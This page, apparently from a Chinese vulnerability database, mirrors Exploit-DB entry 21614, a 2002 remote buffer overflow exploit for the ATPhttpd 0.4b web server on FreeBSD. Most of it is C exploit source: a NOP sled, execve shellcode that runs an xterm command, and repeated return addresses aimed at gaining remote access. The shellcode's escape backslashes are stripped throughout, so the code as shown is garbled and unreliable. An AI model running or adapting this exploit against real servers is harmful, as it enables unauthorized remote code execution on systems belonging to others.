ATPhttpd 0.4b – Remote Buffer Overflow

ATPhttpd 0.4b – Remote Buffer Overflow

漏洞ID 1053600 漏洞类型
发布时间 2002-07-12 更新时间 2002-07-12
图片[1]-ATPhttpd 0.4b – Remote Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-ATPhttpd 0.4b – Remote Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 FreeBSD CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21614
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/5215/info

ATPhttpd is a small webserver designed for high-performance. It was developed by Yann Ramin.

There exist several exploitable buffer overflow conditions in ATPhttpd. Remote attackers may levarage these vulnerabilities to gain access on affected servers. 
*/

/* atphttpd exploit.
 / The exploit sucks, if you get it wrong the first time the server just dies
 / so I didnt bother adding any offset argument to the exploit. Also if you 
 / change the IP addy you may have to change the alignment a little.   
 /
 / http://www.badc0ded.com 
*/

#define ret "x78xf5xbfxbf"
char FreeBSD[]=		 /* stolen lsd-pl.net shellcode	   */  	
  "xebx25"             /* jmp     <cmdshellcode+39>      */
  "x59"                 /* popl    %ecx                   */
  "x31xc0"             /* xorl    %eax,%eax              */
  "x50"                 /* pushl   %eax                   */
  "x68""//sh"           /* pushl   $0x68732f2f            */
  "x68""/bin"           /* pushl   $0x6e69622f            */
  "x89xe3"             /* movl    %esp,%ebx              */
  "x50"                 /* pushl   %eax                   */
  "x66x68""-c"         /* pushw   $0x632d                */
  "x89xe7"             /* movl    %esp,%edi              */
  "x50"                 /* pushl   %eax                   */
  "x51"                 /* pushl   %ecx                   */
  "x57"                 /* pushl   %edi                   */
  "x53"                 /* pushl   %ebx                   */
  "x89xe7"             /* movl    %esp,%edi              */
  "x50"                 /* pushl   %eax                   */
  "x57"                 /* pushl   %edi                   */
  "x53"                 /* pushl   %ebx                   */
  "x50"                 /* pushl   %eax                   */
  "xb0x3b"             /* movb    $0x0b,%al              */
  "xcdx80"             /* int     $0x80                  */ 
  "xe8xd6xffxffxff" /* call    <cmdshellcode+2>       */
  "/usr/X11R6/bin/xterm -display 127.0.0.1:0;";

main ()
{
  int i;
  for (i=0;i<=501;i++) // this would be a good place to change alignment
    printf("x90");
  printf("%s",FreeBSD);
  for (i=0;i<=100;i++) 
    printf("%s",ret);
  printf("nn");
}

相关推荐: DataLynx suGuard Vulnerability

DataLynx suGuard Vulnerability 漏洞ID 1104867 漏洞类型 Environment Error 发布时间 1999-01-03 更新时间 1999-01-03 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享